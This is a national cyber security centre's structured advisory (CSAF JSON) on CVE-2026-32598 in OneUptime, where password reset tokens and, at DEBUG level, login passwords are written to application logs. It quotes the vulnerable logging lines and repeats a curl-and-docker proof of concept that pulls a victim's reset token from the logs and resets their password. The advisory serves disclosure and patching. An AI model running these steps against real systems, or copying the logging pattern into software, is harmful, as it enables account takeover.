{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-32598", "tracking": { "current_release_date": "2026-03-23T14:13:33.560357Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-32598", "initial_release_date": "2026-03-12T21:38:34.212861Z", "revision_history": [ { "date": "2026-03-12T21:38:34.212861Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (1).| CWES updated (1)." }, { "date": "2026-03-12T21:38:44.374854Z", "number": "2", "summary": "NCSC Score created." }, { "date": "2026-03-13T07:35:33.427035Z", "number": "3", "summary": "NCSC Score updated." }, { "date": "2026-03-13T14:12:55.105171Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-13T20:38:28.137915Z", "number": "5", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (1).| CWES updated (1)." }, { "date": "2026-03-13T20:38:36.569831Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-13T21:12:44.385250Z", "number": "7", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-13T21:12:47.182566Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-14T04:39:07.593180Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-16T17:45:18.855514Z", "number": "10", "summary": "References created (1)." }, { "date": "2026-03-16T17:45:31.887587Z", "number": "11", "summary": "NCSC Score updated." }, { "date": "2026-03-16T18:20:34.817864Z", "number": "12", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-17T20:26:10.203481Z", "number": "13", "summary": "CVSS created.| Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-03-17T20:26:12.355972Z", "number": "14", "summary": "NCSC Score updated." }, { "date": "2026-03-19T15:28:41.851562Z", "number": "15", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-19T15:28:44.617213Z", "number": "16", "summary": "NCSC Score updated." }, { "date": "2026-03-20T09:29:55.995318Z", "number": "17", "summary": "Source connected.| CVE status created. (valid)| EPSS created." } ], "status": "interim", "version": "17" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<10.0.24", "product": { "name": "vers:unknown/<10.0.24", "product_id": "CSAFPID-5810819" } }, { "category": "product_version_range", "name": "vers:unknown/>=0|<10.0.23", "product": { "name": "vers:unknown/>=0|<10.0.23", "product_id": "CSAFPID-5830034" } } ], "category": "product_name", "name": "oneuptime" } ], "category": "vendor", "name": "OneUptime" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<10.0.24", "product": { "name": "vers:unknown/<10.0.24", "product_id": "CSAFPID-5839260", "product_identification_helper": { "cpe": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "oneuptime" } ], "category": "vendor", "name": "hackerbay" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-32598", "cwe": { "id": "CWE-532", "name": "Insertion of Sensitive Information into Log File" }, "notes": [ { "category": "description", "text": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.24, the password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user. This vulnerability is fixed in 10.0.24.", "title": "cveprojectv5 - https://www.cve.org/CVERecord?id=CVE-2026-32598" }, { "category": "description", "text": "OneUptime is a solution for monitoring and managing online services. Prior to 10.0.24, the password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user. This vulnerability is fixed in 10.0.24.", "title": "nvd - https://nvd.nist.gov/vuln/detail/CVE-2026-32598" }, { "category": "description", "text": "### Summary\n\nThe password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user.\n\n### Details\n\n**Vulnerable code — `App/FeatureSet/Identity/API/Authentication.ts` lines 370-371:**\n```typescript\nlogger.info(\"User forgot password: \" + user.email?.toString());\nlogger.info(\"Reset Password URL: \" + tokenVerifyUrl);\n```\n\nThe `tokenVerifyUrl` is a complete URL like `https://app.oneuptime.com/accounts/reset-password/`. This is logged at INFO level, which is enabled by default in production and persisted to stdout, log files, and any configured log aggregation systems.\n\n**Additionally — login credentials logged at DEBUG level (line 909):**\n```typescript\nlogger.debug(\"Login request data: \" + JSON.stringify(req.body, null, 2));\n```\n\nThe entire login request body (including cleartext password) is logged at DEBUG level. While DEBUG is typically disabled in production, it is commonly enabled during incident troubleshooting.\n\nNo existing CVEs cover sensitive data exposure in logging for OneUptime. CVE-2026-30956 (GHSA-r5v6-2599-9g3m) leaked `resetPasswordToken` from the database via multi-tenant header bypass — this finding is different (token leaked via application logs).\n\n### PoC\n\n**Environment:** OneUptime v10.0.23 via `docker compose up` (default configuration)\n\n```bash\n# Step 1 — Trigger forgot-password for target user\ncurl -s -X POST http://TARGET:8080/api/identity/forgot-password \\\n -H 'Content-Type: application/json' \\\n -d '{\"data\": {\"email\": \"test@example.com\"}}'\n# Response: {}\n\n# Step 2 — Read application logs to extract the reset token\ndocker compose logs app --tail 5\n# Output:\n# app-1 | User forgot password: test@example.com\n# app-1 | Reset Password URL: http://localhost/accounts/reset-password/20771cc6-860a-4b9b-bb9c-09eff67de4ef\n\n# Step 3 — Use the extracted token to reset the victim's password\ncurl -s -X POST http://TARGET:8080/api/identity/reset-password \\\n -H 'Content-Type: application/json' \\\n -d '{\"data\": {\"token\": \"20771cc6-860a-4b9b-bb9c-09eff67de4ef\", \"password\": \"NewPassword123!\"}}'\n```\n\n**Tested and confirmed on 2026-03-12 against `oneuptime/app:release` (APP_VERSION=10.0.23).** Full password reset token `20771cc6-860a-4b9b-bb9c-09eff67de4ef` visible in INFO-level logs.\n\n**Attack surface for log access:** ELK/Elasticsearch dashboards (often misconfigured with default credentials), CloudWatch/Datadog/Splunk/Grafana Loki, `docker logs` / `kubectl logs`, shared log volumes, CDN/proxy access logs.\n\n### Impact\n\nAny user's account can be taken over by anyone with read access to application logs:\n\n- **Account takeover:** Every password reset token is logged in plaintext, creating a persistent trail of sensitive tokens\n- **Exposure scale:** This logs EVERY password reset request — not a one-off, but systematic\n- **Cascading impact:** Combined with differential error responses in forgot-password (user enumeration), an attacker can systematically target any user\n- Organizations that aggregate OneUptime logs into shared logging infrastructure expose all password reset tokens to anyone with log reader access", "title": "github - https://github.com/advisories/GHSA-4524-cj9j-g4fj" }, { "category": "description", "text": "### Summary\n\nThe password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user.\n\n### Details\n\n**Vulnerable code — `App/FeatureSet/Identity/API/Authentication.ts` lines 370-371:**\n```typescript\nlogger.info(\"User forgot password: \" + user.email?.toString());\nlogger.info(\"Reset Password URL: \" + tokenVerifyUrl);\n```\n\nThe `tokenVerifyUrl` is a complete URL like `https://app.oneuptime.com/accounts/reset-password/`. This is logged at INFO level, which is enabled by default in production and persisted to stdout, log files, and any configured log aggregation systems.\n\n**Additionally — login credentials logged at DEBUG level (line 909):**\n```typescript\nlogger.debug(\"Login request data: \" + JSON.stringify(req.body, null, 2));\n```\n\nThe entire login request body (including cleartext password) is logged at DEBUG level. While DEBUG is typically disabled in production, it is commonly enabled during incident troubleshooting.\n\nNo existing CVEs cover sensitive data exposure in logging for OneUptime. CVE-2026-30956 (GHSA-r5v6-2599-9g3m) leaked `resetPasswordToken` from the database via multi-tenant header bypass — this finding is different (token leaked via application logs).\n\n### PoC\n\n**Environment:** OneUptime v10.0.23 via `docker compose up` (default configuration)\n\n```bash\n# Step 1 — Trigger forgot-password for target user\ncurl -s -X POST http://TARGET:8080/api/identity/forgot-password \\\n -H 'Content-Type: application/json' \\\n -d '{\"data\": {\"email\": \"test@example.com\"}}'\n# Response: {}\n\n# Step 2 — Read application logs to extract the reset token\ndocker compose logs app --tail 5\n# Output:\n# app-1 | User forgot password: test@example.com\n# app-1 | Reset Password URL: http://localhost/accounts/reset-password/20771cc6-860a-4b9b-bb9c-09eff67de4ef\n\n# Step 3 — Use the extracted token to reset the victim's password\ncurl -s -X POST http://TARGET:8080/api/identity/reset-password \\\n -H 'Content-Type: application/json' \\\n -d '{\"data\": {\"token\": \"20771cc6-860a-4b9b-bb9c-09eff67de4ef\", \"password\": \"NewPassword123!\"}}'\n```\n\n**Tested and confirmed on 2026-03-12 against `oneuptime/app:release` (APP_VERSION=10.0.23).** Full password reset token `20771cc6-860a-4b9b-bb9c-09eff67de4ef` visible in INFO-level logs.\n\n**Attack surface for log access:** ELK/Elasticsearch dashboards (often misconfigured with default credentials), CloudWatch/Datadog/Splunk/Grafana Loki, `docker logs` / `kubectl logs`, shared log volumes, CDN/proxy access logs.\n\n### Impact\n\nAny user's account can be taken over by anyone with read access to application logs:\n\n- **Account takeover:** Every password reset token is logged in plaintext, creating a persistent trail of sensitive tokens\n- **Exposure scale:** This logs EVERY password reset request — not a one-off, but systematic\n- **Cascading impact:** Combined with differential error responses in forgot-password (user enumeration), an attacker can systematically target any user\n- Organizations that aggregate OneUptime logs into shared logging infrastructure expose all password reset tokens to anyone with log reader access", "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-4524-cj9j-g4fj.json?alt=media" }, { "category": "description", "text": "### Summary\n\nThe password reset flow logs the complete password reset URL — containing the plaintext reset token — at INFO log level, which is enabled by default in production. Anyone with access to application logs (log aggregation, Docker logs, Kubernetes pod logs) can intercept reset tokens and perform account takeover on any user.\n\n### Details\n\n**Vulnerable code — `App/FeatureSet/Identity/API/Authentication.ts` lines 370-371:**\n```typescript\nlogger.info(\"User forgot password: \" + user.email?.toString());\nlogger.info(\"Reset Password URL: \" + tokenVerifyUrl);\n```\n\nThe `tokenVerifyUrl` is a complete URL like `https://app.oneuptime.com/accounts/reset-password/`. This is logged at INFO level, which is enabled by default in production and persisted to stdout, log files, and any configured log aggregation systems.\n\n**Additionally — login credentials logged at DEBUG level (line 909):**\n```typescript\nlogger.debug(\"Login request data: \" + JSON.stringify(req.body, null, 2));\n```\n\nThe entire login request body (including cleartext password) is logged at DEBUG level. While DEBUG is typically disabled in production, it is commonly enabled during incident troubleshooting.\n\nNo existing CVEs cover sensitive data exposure in logging for OneUptime. CVE-2026-30956 (GHSA-r5v6-2599-9g3m) leaked `resetPasswordToken` from the database via multi-tenant header bypass — this finding is different (token leaked via application logs).\n\n### PoC\n\n**Environment:** OneUptime v10.0.23 via `docker compose up` (default configuration)\n\n```bash\n# Step 1 — Trigger forgot-password for target user\ncurl -s -X POST http://TARGET:8080/api/identity/forgot-password \\\n -H 'Content-Type: application/json' \\\n -d '{\"data\": {\"email\": \"test@example.com\"}}'\n# Response: {}\n\n# Step 2 — Read application logs to extract the reset token\ndocker compose logs app --tail 5\n# Output:\n# app-1 | User forgot password: test@example.com\n# app-1 | Reset Password URL: http://localhost/accounts/reset-password/20771cc6-860a-4b9b-bb9c-09eff67de4ef\n\n# Step 3 — Use the extracted token to reset the victim's password\ncurl -s -X POST http://TARGET:8080/api/identity/reset-password \\\n -H 'Content-Type: application/json' \\\n -d '{\"data\": {\"token\": \"20771cc6-860a-4b9b-bb9c-09eff67de4ef\", \"password\": \"NewPassword123!\"}}'\n```\n\n**Tested and confirmed on 2026-03-12 against `oneuptime/app:release` (APP_VERSION=10.0.23).** Full password reset token `20771cc6-860a-4b9b-bb9c-09eff67de4ef` visible in INFO-level logs.\n\n**Attack surface for log access:** ELK/Elasticsearch dashboards (often misconfigured with default credentials), CloudWatch/Datadog/Splunk/Grafana Loki, `docker logs` / `kubectl logs`, shared log volumes, CDN/proxy access logs.\n\n### Impact\n\nAny user's account can be taken over by anyone with read access to application logs:\n\n- **Account takeover:** Every password reset token is logged in plaintext, creating a persistent trail of sensitive tokens\n- **Exposure scale:** This logs EVERY password reset request — not a one-off, but systematic\n- **Cascading impact:** Combined with differential error responses in forgot-password (user enumeration), an attacker can systematically target any user\n- Organizations that aggregate OneUptime logs into shared logging infrastructure expose all password reset tokens to anyone with log reader access", "title": "github - https://api.github.com/advisories/GHSA-4524-cj9j-g4fj" }, { "category": "other", "text": "0.00029", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N", "title": "CVSSV4" }, { "category": "other", "text": "6.9", "title": "CVSSV4 base score" }, { "category": "other", "text": "3.8", "title": "NCSC Score" }, { "category": "other", "text": "Is related to CWE-532 (Insertion of Sensitive Information into Log File)", "title": "NCSC Score top increasing factors" }, { "category": "other", "text": "The value of the most recent CVSS (V3) score, There is exploit data available from source Nvd, Is related to (a version of) an uncommon product, There is cwe data available from source Nvd", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5810819", "CSAFPID-5830034", "CSAFPID-5839260" ] }, "references": [ { "category": "external", "summary": "Source - cveprojectv5", "url": "https://www.cve.org/CVERecord?id=CVE-2026-32598" }, { "category": "external", "summary": "Source raw - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/32xxx/CVE-2026-32598.json" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-32598" }, { "category": "external", "summary": "Source raw - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - nvd", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32598" }, { "category": "external", "summary": "Source raw - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-32598" }, { "category": "external", "summary": "Source - github", "url": "https://github.com/advisories/GHSA-4524-cj9j-g4fj" }, { "category": "external", "summary": "Source raw - github", "url": "https://api.github.com/advisories/GHSA-4524-cj9j-g4fj" }, { "category": "external", "summary": "Source - osv", "url": "https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/npm%2FGHSA-4524-cj9j-g4fj.json?alt=media" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-4524-cj9j-g4fj" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd; osv", "url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-4524-cj9j-g4fj" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.23" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-4524-cj9j-g4fj" }, { "category": "external", "summary": "Reference - github; osv", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32598" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5810819", "CSAFPID-5830034", "CSAFPID-5839260" ] } ], "title": "CVE-2026-32598" } ] }